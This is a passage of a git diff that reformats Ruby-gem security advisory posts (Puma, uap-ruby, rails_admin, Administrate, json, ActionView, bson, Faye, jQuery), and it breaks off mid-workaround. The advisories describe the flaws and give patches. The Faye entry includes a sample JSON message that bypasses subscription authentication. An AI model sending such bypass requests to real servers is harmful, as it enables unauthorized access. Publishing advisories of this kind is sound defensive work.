-    While not an attack in itself, response splitting is a vector for several other
-    attacks, such as cross-site scripting (XSS).
-
-    This is related to [CVE-2020-5247](https://github.com/puma/puma/security/advisories/GHSA-84j7-475p-hp8v),
-    which fixed this vulnerability but only for regular responses.
-
-    ### Patches
-    This has been fixed in 4.3.3 and 3.12.4.
-
-    ### Workarounds
-    Users can not allow untrusted/user input in the Early Hints response header.
-  cvss_v3: 6.5
-  patched_versions:
-  - "~> 3.12.4"
-  - ">= 4.3.3"
-  related:
-    cve:
-    - 2020-5247
----
+---
+layout: advisory
+title: 'CVE-2020-5249 (puma): HTTP Response Splitting (Early Hints) in Puma'
+comments: false
+categories:
+- puma
+advisory:
+  gem: puma
+  cve: 2020-5249
+  ghsa: 33vf-4xgg-9r58
+  url: https://github.com/puma/puma/security/advisories/GHSA-33vf-4xgg-9r58
+  date: 2020-03-03
+  title: HTTP Response Splitting (Early Hints) in Puma
+  description: |
+    ### Impact
+    If an application using Puma allows untrusted input in an early-hints header,
+    an attacker can use a carriage return character to end the header and inject
+    malicious content, such as additional headers or an entirely new response body.
+    This vulnerability is known as [HTTP Response
+    Splitting](https://owasp.org/www-community/attacks/HTTP_Response_Splitting)
+
+    While not an attack in itself, response splitting is a vector for several other
+    attacks, such as cross-site scripting (XSS).
+
+    This is related to [CVE-2020-5247](https://github.com/puma/puma/security/advisories/GHSA-84j7-475p-hp8v),
+    which fixed this vulnerability but only for regular responses.
+
+    ### Patches
+    This has been fixed in 4.3.3 and 3.12.4.
+
+    ### Workarounds
+    Users can not allow untrusted/user input in the Early Hints response header.
+  cvss_v3: 6.5
+  patched_versions:
+  - "~> 3.12.4"
+  - ">= 4.3.3"
+  related:
+    cve:
+    - 2020-5247
+---
diff --git a/advisories/_posts/2020-03-10-CVE-2020-5243.md b/advisories/_posts/2020-03-10-CVE-2020-5243.md
index a6989346..3756e5fe 100644
--- a/advisories/_posts/2020-03-10-CVE-2020-5243.md
+++ b/advisories/_posts/2020-03-10-CVE-2020-5243.md
@@ -1,37 +1,37 @@
----
-layout: advisory
-title: 'CVE-2020-5243 (user_agent_parser): Denial of Service in uap-core when processing
-  crafted User-Agent strings'
-comments: false
-categories:
-- user_agent_parser
-advisory:
-  gem: user_agent_parser
-  cve: 2020-5243
-  ghsa: pcqq-5962-hvcw
-  url: https://github.com/ua-parser/uap-ruby/security/advisories/GHSA-pcqq-5962-hvcw
-  date: 2020-03-10
-  title: Denial of Service in uap-core when processing crafted User-Agent strings
-  description: |
-    ### Impact
-    Some regexes are vulnerable to regular expression denial of service (REDoS) due to
-    overlapping capture groups. This allows remote attackers to overload a server by
-    setting the User-Agent header in an HTTP(S) request to maliciously crafted long
-    strings.
-
-    ### Patches
-    Please update `uap-ruby` to >= v2.6.0
-
-    ### For more information
-    https://github.com/ua-parser/uap-core/security/advisories/GHSA-cmcx-xhr8-3w9p
-  cvss_v3: 5.7
-  patched_versions:
-  - ">= 2.6.0"
-  related:
-    ghsa:
-    - cmcx-xhr8-3w9p
-    url:
-    - https://github.com/ua-parser/uap-ruby/security/advisories/GHSA-pcqq-5962-hvcw
-    - https://github.com/ua-parser/uap-ruby/commit/2bb18268f4c5ba7d4ba0e21c296bf6437063da3a
-    - https://github.com/advisories/GHSA-pcqq-5962-hvcw
----
+---
+layout: advisory
+title: 'CVE-2020-5243 (user_agent_parser): Denial of Service in uap-core when processing
+  crafted User-Agent strings'
+comments: false
+categories:
+- user_agent_parser
+advisory:
+  gem: user_agent_parser
+  cve: 2020-5243
+  ghsa: pcqq-5962-hvcw
+  url: https://github.com/ua-parser/uap-ruby/security/advisories/GHSA-pcqq-5962-hvcw
+  date: 2020-03-10
+  title: Denial of Service in uap-core when processing crafted User-Agent strings
+  description: |
+    ### Impact
+    Some regexes are vulnerable to regular expression denial of service (REDoS) due to
+    overlapping capture groups. This allows remote attackers to overload a server by
+    setting the User-Agent header in an HTTP(S) request to maliciously crafted long
+    strings.
+
+    ### Patches
+    Please update `uap-ruby` to >= v2.6.0
+
+    ### For more information
+    https://github.com/ua-parser/uap-core/security/advisories/GHSA-cmcx-xhr8-3w9p
+  cvss_v3: 5.7
+  patched_versions:
+  - ">= 2.6.0"
+  related:
+    ghsa:
+    - cmcx-xhr8-3w9p
+    url:
+    - https://github.com/ua-parser/uap-ruby/security/advisories/GHSA-pcqq-5962-hvcw
+    - https://github.com/ua-parser/uap-ruby/commit/2bb18268f4c5ba7d4ba0e21c296bf6437063da3a
+    - https://github.com/advisories/GHSA-pcqq-5962-hvcw
+---
diff --git a/advisories/_posts/2020-03-14-CVE-2020-36190.md b/advisories/_posts/2020-03-14-CVE-2020-36190.md
index fb8cb77a..47422a61 100644
--- a/advisories/_posts/2020-03-14-CVE-2020-36190.md
+++ b/advisories/_posts/2020-03-14-CVE-2020-36190.md
@@ -1,21 +1,21 @@
----
-layout: advisory
-title: 'CVE-2020-36190 (rails_admin): rails_admin ruby gem XSS vulnerability'
-comments: false
-categories:
-- rails_admin
-advisory:
-  gem: rails_admin
-  cve: 2020-36190
-  ghsa: wjx2-7hqq-8h7m
-  url: https://github.com/sferik/rails_admin/commit/d72090ec6a07c3b9b7b48ab50f3d405f91ff4375
-  title: rails_admin ruby gem XSS vulnerability
-  date: 2020-03-14
-  description: |
-    RailsAdmin (aka rails_admin) before 1.4.3 and 2.x before 2.0.2 allows
-    XSS via nested forms.
-  cvss_v3: 6.1
-  patched_versions:
-  - "~> 1.4.3"
-  - ">= 2.0.2"
----
+---
+layout: advisory
+title: 'CVE-2020-36190 (rails_admin): rails_admin ruby gem XSS vulnerability'
+comments: false
+categories:
+- rails_admin
+advisory:
+  gem: rails_admin
+  cve: 2020-36190
+  ghsa: wjx2-7hqq-8h7m
+  url: https://github.com/sferik/rails_admin/commit/d72090ec6a07c3b9b7b48ab50f3d405f91ff4375
+  title: rails_admin ruby gem XSS vulnerability
+  date: 2020-03-14
+  description: |
+    RailsAdmin (aka rails_admin) before 1.4.3 and 2.x before 2.0.2 allows
+    XSS via nested forms.
+  cvss_v3: 6.1
+  patched_versions:
+  - "~> 1.4.3"
+  - ">= 2.0.2"
+---
diff --git a/advisories/_posts/2020-03-14-CVE-2020-5257.md b/advisories/_posts/2020-03-14-CVE-2020-5257.md
index e8d75270..c20f0e44 100644
--- a/advisories/_posts/2020-03-14-CVE-2020-5257.md
+++ b/advisories/_posts/2020-03-14-CVE-2020-5257.md
@@ -1,31 +1,31 @@
----
-layout: advisory
-title: 'CVE-2020-5257 (administrate): Sort order SQL injection via `direction` parameter
-  in administrate'
-comments: false
-categories:
-- administrate
-advisory:
-  gem: administrate
-  cve: 2020-5257
-  ghsa: 2p5p-m353-833w
-  title: Sort order SQL injection via `direction` parameter in administrate
-  date: 2020-03-14
-  url: https://github.com/advisories/GHSA-2p5p-m353-833w
-  description: |
-    In Administrate (rubygem) before version 0.13.0, when sorting by attributes
-    on a dashboard, the direction parameter was not validated before being
-    interpolated into the SQL query.
-
-    This could present a SQL injection if the attacker were able to modify the
-    direction parameter and bypass ActiveRecord SQL protections.
-
-    Whilst this does have a high-impact, to exploit this you need access to the
-    Administrate dashboards, which should generally be behind authentication.
-  cvss_v3: 7.7
-  patched_versions:
-  - ">= 0.13.0"
-  related:
-    url:
-    - https://github.com/thoughtbot/administrate/commit/3ab838b83c5f565fba50e0c6f66fe4517f98eed3
----
+---
+layout: advisory
+title: 'CVE-2020-5257 (administrate): Sort order SQL injection via `direction` parameter
+  in administrate'
+comments: false
+categories:
+- administrate
+advisory:
+  gem: administrate
+  cve: 2020-5257
+  ghsa: 2p5p-m353-833w
+  title: Sort order SQL injection via `direction` parameter in administrate
+  date: 2020-03-14
+  url: https://github.com/advisories/GHSA-2p5p-m353-833w
+  description: |
+    In Administrate (rubygem) before version 0.13.0, when sorting by attributes
+    on a dashboard, the direction parameter was not validated before being
+    interpolated into the SQL query.
+
+    This could present a SQL injection if the attacker were able to modify the
+    direction parameter and bypass ActiveRecord SQL protections.
+
+    Whilst this does have a high-impact, to exploit this you need access to the
+    Administrate dashboards, which should generally be behind authentication.
+  cvss_v3: 7.7
+  patched_versions:
+  - ">= 0.13.0"
+  related:
+    url:
+    - https://github.com/thoughtbot/administrate/commit/3ab838b83c5f565fba50e0c6f66fe4517f98eed3
+---
diff --git a/advisories/_posts/2020-03-19-CVE-2020-10663.md b/advisories/_posts/2020-03-19-CVE-2020-10663.md
index a3bc0ebc..82699938 100644
--- a/advisories/_posts/2020-03-19-CVE-2020-10663.md
+++ b/advisories/_posts/2020-03-19-CVE-2020-10663.md
@@ -1,43 +1,43 @@
----
-layout: advisory
-title: 'CVE-2020-10663 (json): json Gem for Ruby Unsafe Object Creation Vulnerability
-  (additional fix)'
-comments: false
-categories:
-- json
-advisory:
-  gem: json
-  cve: 2020-10663
-  ghsa: jphg-qwrw-7w9g
-  url: https://www.ruby-lang.org/en/news/2020/03/19/json-dos-cve-2020-10663/
-  title: json Gem for Ruby Unsafe Object Creation Vulnerability (additional fix)
-  date: 2020-03-19
-  description: |
-    There is an unsafe object creation vulnerability in the json gem bundled with
-    Ruby. This vulnerability has been assigned the CVE identifier CVE-2020-10663.
-    We strongly recommend upgrading the json gem.
-
-    Details
-    -------
-
-    When parsing certain JSON documents, the json gem (including the one bundled
-    with Ruby) can be coerced into creating arbitrary objects in the target system.
-
-    This is the same issue as CVE-2013-0269. The previous fix was incomplete, which
-    addressed JSON.parse(user_input), but didn’t address some other styles of JSON
-    parsing including JSON(user_input) and JSON.parse(user_input, nil).
-
-    See CVE-2013-0269 in detail. Note that the issue was exploitable to cause a
-    Denial of Service by creating many garbage-uncollectable Symbol objects, but
-    this kind of attack is no longer valid because Symbol objects are now
-    garbage-collectable. However, creating arbitrary objects may cause severe
-    security consequences depending upon the application code.
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 2.3.0"
-  related:
-    cve:
-    - 2013-0269
-    url:
-    - https://groups.google.com/forum/#!topic/ruby-security-ann/ermX1eQqqKA
----
+---
+layout: advisory
+title: 'CVE-2020-10663 (json): json Gem for Ruby Unsafe Object Creation Vulnerability
+  (additional fix)'
+comments: false
+categories:
+- json
+advisory:
+  gem: json
+  cve: 2020-10663
+  ghsa: jphg-qwrw-7w9g
+  url: https://www.ruby-lang.org/en/news/2020/03/19/json-dos-cve-2020-10663/
+  title: json Gem for Ruby Unsafe Object Creation Vulnerability (additional fix)
+  date: 2020-03-19
+  description: |
+    There is an unsafe object creation vulnerability in the json gem bundled with
+    Ruby. This vulnerability has been assigned the CVE identifier CVE-2020-10663.
+    We strongly recommend upgrading the json gem.
+
+    Details
+    -------
+
+    When parsing certain JSON documents, the json gem (including the one bundled
+    with Ruby) can be coerced into creating arbitrary objects in the target system.
+
+    This is the same issue as CVE-2013-0269. The previous fix was incomplete, which
+    addressed JSON.parse(user_input), but didn’t address some other styles of JSON
+    parsing including JSON(user_input) and JSON.parse(user_input, nil).
+
+    See CVE-2013-0269 in detail. Note that the issue was exploitable to cause a
+    Denial of Service by creating many garbage-uncollectable Symbol objects, but
+    this kind of attack is no longer valid because Symbol objects are now
+    garbage-collectable. However, creating arbitrary objects may cause severe
+    security consequences depending upon the application code.
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 2.3.0"
+  related:
+    cve:
+    - 2013-0269
+    url:
+    - https://groups.google.com/forum/#!topic/ruby-security-ann/ermX1eQqqKA
+---
diff --git a/advisories/_posts/2020-03-19-CVE-2020-5267.md b/advisories/_posts/2020-03-19-CVE-2020-5267.md
index 816adc71..0aa43e7b 100644
--- a/advisories/_posts/2020-03-19-CVE-2020-5267.md
+++ b/advisories/_posts/2020-03-19-CVE-2020-5267.md
@@ -1,78 +1,78 @@
----
-layout: advisory
-title: 'CVE-2020-5267 (actionview): Possible XSS vulnerability in ActionView'
-comments: false
-categories:
-- actionview
-- rails
-advisory:
-  gem: actionview
-  framework: rails
-  cve: 2020-5267
-  ghsa: 65cv-r6x7-79hv
-  url: https://groups.google.com/forum/#!topic/rubyonrails-security/55reWMM_Pg8
-  title: Possible XSS vulnerability in ActionView
-  date: 2020-03-19
-  description: |
-    There is a possible XSS vulnerability in ActionView's JavaScript literal
-    escape helpers.  Views that use the `j` or `escape_javascript` methods
-    may be susceptible to XSS attacks.
-
-    Versions Affected:  All.
-    Not affected:       None.
-    Fixed Versions:     6.0.2.2, 5.2.4.2
-
-    Impact
-    ------
-    There is a possible XSS vulnerability in the `j` and `escape_javascript`
-    methods in ActionView.  These methods are used for escaping JavaScript string
-    literals.  Impacted code will look something like this:
-
-    ```erb
-    <script>let a = `<%= j unknown_input %>`</script>
-    ```
-
-    or
-
-    ```erb
-    <script>let a = `<%= escape_javascript unknown_input %>`</script>
-    ```
-
-    Releases
-    --------
-    The 6.0.2.2 and 5.2.4.2 releases are available at the normal locations.
-
-    Workarounds
-    -----------
-    For those that can't upgrade, the following monkey patch may be used:
-
-    ```ruby
-    ActionView::Helpers::JavaScriptHelper::JS_ESCAPE_MAP.merge!(
-      {
-        "`" => "\\`",
-        "$" => "\\$"
-      }
-    )
-
-    module ActionView::Helpers::JavaScriptHelper
-      alias :old_ej :escape_javascript
-      alias :old_j :j
-
-      def escape_javascript(javascript)
-        javascript = javascript.to_s
-        if javascript.empty?
-          result = ""
-        else
-          result = javascript.gsub(/(\\|<\/|\r\n|\342\200\250|\342\200\251|[\n\r"']|[`]|[$])/u, JS_ESCAPE_MAP)
-        end
-        javascript.html_safe? ? result.html_safe : result
-      end
-
-      alias :j :escape_javascript
-    end
-    ```
-  cvss_v3: 4.0
-  patched_versions:
-  - "~> 5.2.4, >= 5.2.4.2"
-  - ">= 6.0.2.2"
----
+---
+layout: advisory
+title: 'CVE-2020-5267 (actionview): Possible XSS vulnerability in ActionView'
+comments: false
+categories:
+- actionview
+- rails
+advisory:
+  gem: actionview
+  framework: rails
+  cve: 2020-5267
+  ghsa: 65cv-r6x7-79hv
+  url: https://groups.google.com/forum/#!topic/rubyonrails-security/55reWMM_Pg8
+  title: Possible XSS vulnerability in ActionView
+  date: 2020-03-19
+  description: |
+    There is a possible XSS vulnerability in ActionView's JavaScript literal
+    escape helpers.  Views that use the `j` or `escape_javascript` methods
+    may be susceptible to XSS attacks.
+
+    Versions Affected:  All.
+    Not affected:       None.
+    Fixed Versions:     6.0.2.2, 5.2.4.2
+
+    Impact
+    ------
+    There is a possible XSS vulnerability in the `j` and `escape_javascript`
+    methods in ActionView.  These methods are used for escaping JavaScript string
+    literals.  Impacted code will look something like this:
+
+    ```erb
+    <script>let a = `<%= j unknown_input %>`</script>
+    ```
+
+    or
+
+    ```erb
+    <script>let a = `<%= escape_javascript unknown_input %>`</script>
+    ```
+
+    Releases
+    --------
+    The 6.0.2.2 and 5.2.4.2 releases are available at the normal locations.
+
+    Workarounds
+    -----------
+    For those that can't upgrade, the following monkey patch may be used:
+
+    ```ruby
+    ActionView::Helpers::JavaScriptHelper::JS_ESCAPE_MAP.merge!(
+      {
+        "`" => "\\`",
+        "$" => "\\$"
+      }
+    )
+
+    module ActionView::Helpers::JavaScriptHelper
+      alias :old_ej :escape_javascript
+      alias :old_j :j
+
+      def escape_javascript(javascript)
+        javascript = javascript.to_s
+        if javascript.empty?
+          result = ""
+        else
+          result = javascript.gsub(/(\\|<\/|\r\n|\342\200\250|\342\200\251|[\n\r"']|[`]|[$])/u, JS_ESCAPE_MAP)
+        end
+        javascript.html_safe? ? result.html_safe : result
+      end
+
+      alias :j :escape_javascript
+    end
+    ```
+  cvss_v3: 4.0
+  patched_versions:
+  - "~> 5.2.4, >= 5.2.4.2"
+  - ">= 6.0.2.2"
+---
diff --git a/advisories/_posts/2020-04-29-CVE-2015-4411.md b/advisories/_posts/2020-04-29-CVE-2015-4411.md
index fbafe775..d96fa893 100644
--- a/advisories/_posts/2020-04-29-CVE-2015-4411.md
+++ b/advisories/_posts/2020-04-29-CVE-2015-4411.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2015-4411 (bson): Potential denial of service in bson rubygem'
-comments: false
-categories:
-- bson
-advisory:
-  gem: bson
-  cve: 2015-4411
-  ghsa: qh4w-7pw3-p4rp
-  url: https://github.com/advisories/GHSA-qh4w-7pw3-p4rp
-  date: 2020-04-29
-  title: Potential denial of service in bson rubygem
-  description: |
-    The Moped::BSON::ObjecId.legal? method in mongodb/bson-ruby before 3.0.4
-    as used in rubygem-moped allows remote attackers to cause a denial of service (worker
-    resource consumption) via a crafted string. NOTE: This issue is due to an incomplete
-    fix to CVE-2015-4410.
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 3.0.4"
-  related:
-    cve:
-    - 2015-4410
----
+---
+layout: advisory
+title: 'CVE-2015-4411 (bson): Potential denial of service in bson rubygem'
+comments: false
+categories:
+- bson
+advisory:
+  gem: bson
+  cve: 2015-4411
+  ghsa: qh4w-7pw3-p4rp
+  url: https://github.com/advisories/GHSA-qh4w-7pw3-p4rp
+  date: 2020-04-29
+  title: Potential denial of service in bson rubygem
+  description: |
+    The Moped::BSON::ObjecId.legal? method in mongodb/bson-ruby before 3.0.4
+    as used in rubygem-moped allows remote attackers to cause a denial of service (worker
+    resource consumption) via a crafted string. NOTE: This issue is due to an incomplete
+    fix to CVE-2015-4410.
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 3.0.4"
+  related:
+    cve:
+    - 2015-4410
+---
diff --git a/advisories/_posts/2020-04-29-CVE-2020-11020.md b/advisories/_posts/2020-04-29-CVE-2020-11020.md
index d4436969..96f0ffd5 100644
--- a/advisories/_posts/2020-04-29-CVE-2020-11020.md
+++ b/advisories/_posts/2020-04-29-CVE-2020-11020.md
@@ -1,95 +1,95 @@
----
-layout: advisory
-title: 'CVE-2020-11020 (faye): Authentication and extension bypass in Faye'
-comments: false
-categories:
-- faye
-advisory:
-  gem: faye
-  cve: 2020-11020
-  ghsa: qpg4-4w7w-2mq5
-  url: https://github.com/faye/faye/security/advisories/GHSA-qpg4-4w7w-2mq5
-  date: 2020-04-29
-  title: Authentication and extension bypass in Faye
-  description: |
-    On 20 April 2020 it was reported to me that the potential for authentication
-    bypass exists in [Faye][1]'s extension system. This vulnerability has existed in
-    the Node.js and Ruby versions of the server since version 0.5.0, when extensions
-    were first introduced, in July 2010. It is patched in versions 1.0.4, 1.1.3 and
-    1.2.5, which we are releasing today.
-
-    The vulnerability allows any client to bypass checks put in place by server-side
-    extensions, by appending extra segments to the message channel. For example, the
-    Faye [extension docs][2] suggest that users implement access control for
-    subscriptions by checking incoming messages for the `/meta/subscribe` channel,
-    for example:
-
-    ```js
-    server.addExtension({
-      incoming: function(message, callback) {
-        if (message.channel === '/meta/subscribe') {
-          if (message.ext.authToken !== 'my super secret password') {
-            message.error = 'Invalid auth token';
-          }
-        }
-        callback(message);
-      }
-    });
-    ```
-
-    A bug in the server's code for recognising the special `/meta/*` channels, which
-    trigger connection and subscription events, means that a client can bypass this
-    check by sending a message to `/meta/subscribe/x` rather than `/meta/subscribe`:
-
-    ```json
-    {
-      "channel": "/meta/subscribe/x",
-      "clientId": "3jrc6602npj4gyp6bn5ap2wqzjtb2q3",
-      "subscription": "/foo"
-    }
-    ```
-
-    This message will not be checked by the above extension, as it checks the
-    message's channel is exactly equal to `/meta/subscribe`. But it will still be
-    processed as a subscription request by the server, so the client becomes
-    subscribed to the channel `/foo` without supplying the necessary credentials.
-
-    The vulnerability is caused by the way the Faye server recognises meta channels.
-    It will treat a message to any channel that's a prefix-match for one of the
-    special channels `/meta/handshake`, `/meta/connect`, `/meta/subscribe`,
-    `/meta/unsubscribe` or `/meta/disconnect`, as though it were an exact match for
-    that channel. So, a message to `/meta/subscribe/x` is still processed as a
-    subscription request, for example.
-
-    An authentication bypass for subscription requests is the most serious effect of
-    this but all other meta channels are susceptible to similar manipulation.
-
-    This parsing bug in the server is fixed in versions 1.0.4, 1.1.3 and 1.2.5.
-    These should be drop-in replacements for prior versions and you should upgrade
-    immediately if you are running any prior version.
-
-    If you are unable to install one of these versions, you can make your extensions
-    catch all messages the server would process by checking the channel _begins_
-    with the expected channel name, for example:
-
-    ```js
-    server.addExtension({
-      incoming: function(message, callback) {
-        if (message.channel.startsWith('/meta/subscribe')) {
-          // authentication logic
-        }
-        callback(message);
-      }
-    });
-    ```
-
-    [1]: https://faye.jcoglan.com/
-    [2]: https://faye.jcoglan.com/node/extensions.html
-  cvss_v3: 8.5
-  patched_versions:
-  - "~> 1.0.4"
-  - "~> 1.1.3"
-  - ">= 1.2.5"
-  unaffected_versions:
-  - "< 0.5.0"
----
+---
+layout: advisory
+title: 'CVE-2020-11020 (faye): Authentication and extension bypass in Faye'
+comments: false
+categories:
+- faye
+advisory:
+  gem: faye
+  cve: 2020-11020
+  ghsa: qpg4-4w7w-2mq5
+  url: https://github.com/faye/faye/security/advisories/GHSA-qpg4-4w7w-2mq5
+  date: 2020-04-29
+  title: Authentication and extension bypass in Faye
+  description: |
+    On 20 April 2020 it was reported to me that the potential for authentication
+    bypass exists in [Faye][1]'s extension system. This vulnerability has existed in
+    the Node.js and Ruby versions of the server since version 0.5.0, when extensions
+    were first introduced, in July 2010. It is patched in versions 1.0.4, 1.1.3 and
+    1.2.5, which we are releasing today.
+
+    The vulnerability allows any client to bypass checks put in place by server-side
+    extensions, by appending extra segments to the message channel. For example, the
+    Faye [extension docs][2] suggest that users implement access control for
+    subscriptions by checking incoming messages for the `/meta/subscribe` channel,
+    for example:
+
+    ```js
+    server.addExtension({
+      incoming: function(message, callback) {
+        if (message.channel === '/meta/subscribe') {
+          if (message.ext.authToken !== 'my super secret password') {
+            message.error = 'Invalid auth token';
+          }
+        }
+        callback(message);
+      }
+    });
+    ```
+
+    A bug in the server's code for recognising the special `/meta/*` channels, which
+    trigger connection and subscription events, means that a client can bypass this
+    check by sending a message to `/meta/subscribe/x` rather than `/meta/subscribe`:
+
+    ```json
+    {
+      "channel": "/meta/subscribe/x",
+      "clientId": "3jrc6602npj4gyp6bn5ap2wqzjtb2q3",
+      "subscription": "/foo"
+    }
+    ```
+
+    This message will not be checked by the above extension, as it checks the
+    message's channel is exactly equal to `/meta/subscribe`. But it will still be
+    processed as a subscription request by the server, so the client becomes
+    subscribed to the channel `/foo` without supplying the necessary credentials.
+
+    The vulnerability is caused by the way the Faye server recognises meta channels.
+    It will treat a message to any channel that's a prefix-match for one of the
+    special channels `/meta/handshake`, `/meta/connect`, `/meta/subscribe`,
+    `/meta/unsubscribe` or `/meta/disconnect`, as though it were an exact match for
+    that channel. So, a message to `/meta/subscribe/x` is still processed as a
+    subscription request, for example.
+
+    An authentication bypass for subscription requests is the most serious effect of
+    this but all other meta channels are susceptible to similar manipulation.
+
+    This parsing bug in the server is fixed in versions 1.0.4, 1.1.3 and 1.2.5.
+    These should be drop-in replacements for prior versions and you should upgrade
+    immediately if you are running any prior version.
+
+    If you are unable to install one of these versions, you can make your extensions
+    catch all messages the server would process by checking the channel _begins_
+    with the expected channel name, for example:
+
+    ```js
+    server.addExtension({
+      incoming: function(message, callback) {
+        if (message.channel.startsWith('/meta/subscribe')) {
+          // authentication logic
+        }
+        callback(message);
+      }
+    });
+    ```
+
+    [1]: https://faye.jcoglan.com/
+    [2]: https://faye.jcoglan.com/node/extensions.html
+  cvss_v3: 8.5
+  patched_versions:
+  - "~> 1.0.4"
+  - "~> 1.1.3"
+  - ">= 1.2.5"
+  unaffected_versions:
+  - "< 0.5.0"
+---
diff --git a/advisories/_posts/2020-04-29-CVE-2020-11022.md b/advisories/_posts/2020-04-29-CVE-2020-11022.md
index 8ff4bb77..3e6b5318 100644
--- a/advisories/_posts/2020-04-29-CVE-2020-11022.md
+++ b/advisories/_posts/2020-04-29-CVE-2020-11022.md
@@ -1,101 +1,101 @@
----
-layout: advisory
-title: 'CVE-2020-11022 (jquery-rails): Potential XSS vulnerability in jQuery'
-comments: false
-categories:
-- jquery-rails
-- rails
-advisory:
-  gem: jquery-rails
-  framework: rails
-  cve: 2020-11022
-  ghsa: gxr4-xjj5-5px2
-  url: https://github.com/jquery/jquery/security/advisories/GHSA-gxr4-xjj5-5px2
-  title: Potential XSS vulnerability in jQuery
-  date: 2020-04-29
-  description: |
-    ### Impact
-    Passing HTML from untrusted sources - even after sanitizing it - to
-    one of jQuery's DOM manipulation methods (i.e. `.html()`, `.append()`,
-    and others) may execute untrusted code.
-
-    ### Patches
-    This problem is patched in jQuery 3.5.0.
-
-    ### Workarounds
-    To workaround the issue without upgrading, adding the following to
-    your code:
-    ```js
-    jQuery.htmlPrefilter = function( html ) {
-      return html;
-    };
-    ```
-    You need to use at least jQuery 1.12/2.2 or newer to be able to
-    apply this workaround.
-
-    ### References
-    https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/
-    https://jquery.com/upgrade-guide/3.5/
-
-    ### For more information
-    If you have any questions or comments about this advisory, search
-    for a relevant issue in
-    [the jQuery repo](https://github.com/jquery/jquery/issues).
-
-    If you don't find an answer, open a new issue."
-  cvss_v2: 4.3
-  cvss_v3: 6.9
-  unaffected_versions:
-  - "< 1.2.0"
-  patched_versions:
-  - ">= 3.5.0"
-  related:
-    url:
-    - https://github.com/jquery/jquery/security/advisories/GHSA-gxr4-xjj5-5px2
-    - https://github.com/jquery/jquery/commit/1d61fd9407e6fbe82fe55cb0b938307aa0791f77
-    - https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/
-    - https://jquery.com/upgrade-guide/3.5/
-    - https://nvd.nist.gov/vuln/detail/CVE-2020-11022
-    - https://security.netapp.com/advisory/ntap-20200511-0006/
-    - https://www.drupal.org/sa-core-2020-002
-    - https://www.debian.org/security/2020/dsa-4693
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOE7P7APPRQKD4FGNHBKJPDY6FFCOH3W/
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QPN2L2XVQGUA2V5HNQJWHK3APSK3VN7K/
-    - https://www.oracle.com/security-alerts/cpujul2020.html
-    - http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00067.html
-    - https://security.gentoo.org/glsa/202007-03
-    - http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00085.html
-    - https://lists.apache.org/thread.html/rdf44341677cf7eec7e9aa96dcf3f37ed709544863d619cca8c36f133@
-    - https://github.com/advisories/GHSA-gxr4-xjj5-5px2
-    - https://www.npmjs.com/advisories/1518
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AVKYXLWCLZBV2N7M46KYK4LVA5OXWPBY/
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SFP4UK4EGP4AFH2MWYJ5A5Z4I7XVFQ6B/
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SAPQVX3XDNPGFT26QAQ6AJIXZZBZ4CD4/
-    - https://www.oracle.com/security-alerts/cpuoct2020.html
-    - https://lists.apache.org/thread.html/r706cfbc098420f7113968cc377247ec3d1439bce42e679c11c609e2d@
-    - https://lists.apache.org/thread.html/rbb448222ba62c430e21e13f940be4cb5cfc373cd3bce56b48c0ffa67@
-    - http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00039.html
-    - https://lists.apache.org/thread.html/r49ce4243b4738dd763caeb27fa8ad6afb426ae3e8c011ff00b8b1f48@
-    - https://www.tenable.com/security/tns-2020-10
-    - https://www.tenable.com/security/tns-2020-11
-    - https://www.oracle.com/security-alerts/cpujan2021.html
-    - https://lists.apache.org/thread.html/r564585d97bc069137e64f521e68ba490c7c9c5b342df5d73c49a0760@
-    - https://lists.apache.org/thread.html/r8f70b0f65d6bedf316ecd899371fd89e65333bc988f6326d2956735c@
-    - https://www.tenable.com/security/tns-2021-02
-    - https://lists.debian.org/debian-lts-announce/2021/03/msg00033.html
-    - http://packetstormsecurity.com/files/162159/jQuery-1.2-Cross-Site-Scripting.html
-    - https://lists.apache.org/thread.html/rede9cfaa756e050a3d83045008f84a62802fc68c17f2b4eabeaae5e4@
-    - https://lists.apache.org/thread.html/ree3bd8ddb23df5fa4e372d11c226830ea3650056b1059f3965b3fce2@
-    - https://lists.apache.org/thread.html/r54565a8f025c7c4f305355fdfd75b68eca442eebdb5f31c2e7d977ae@
-    - https://lists.apache.org/thread.html/re4ae96fa5c1a2fe71ccbb7b7ac1538bd0cb677be270a2bf6e2f8d108@
-    - https://www.tenable.com/security/tns-2021-10
-    - https://www.oracle.com/security-alerts/cpuApr2021.html
-    - https://www.oracle.com//security-alerts/cpujul2021.html
-    - https://www.oracle.com/security-alerts/cpuoct2021.html
-    - https://lists.apache.org/thread.html/r0483ba0072783c2e1bfea613984bfb3c86e73ba8879d780dc1cc7d36@
-    - https://github.com/jquery/jquery/releases/tag/3.5.0
-    - https://www.oracle.com/security-alerts/cpujan2022.html
-    - https://www.oracle.com/security-alerts/cpuapr2022.html
-    - https://www.oracle.com/security-alerts/cpujul2022.html
-    - https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html
----
+---
+layout: advisory
+title: 'CVE-2020-11022 (jquery-rails): Potential XSS vulnerability in jQuery'
+comments: false
+categories:
+- jquery-rails
+- rails
+advisory:
+  gem: jquery-rails
+  framework: rails
+  cve: 2020-11022
+  ghsa: gxr4-xjj5-5px2
+  url: https://github.com/jquery/jquery/security/advisories/GHSA-gxr4-xjj5-5px2
+  title: Potential XSS vulnerability in jQuery
+  date: 2020-04-29
+  description: |
+    ### Impact
+    Passing HTML from untrusted sources - even after sanitizing it - to
+    one of jQuery's DOM manipulation methods (i.e. `.html()`, `.append()`,
+    and others) may execute untrusted code.
+
+    ### Patches
+    This problem is patched in jQuery 3.5.0.
+
+    ### Workarounds
+    To workaround the issue without upgrading, adding the following to
+    your code:
+    ```js
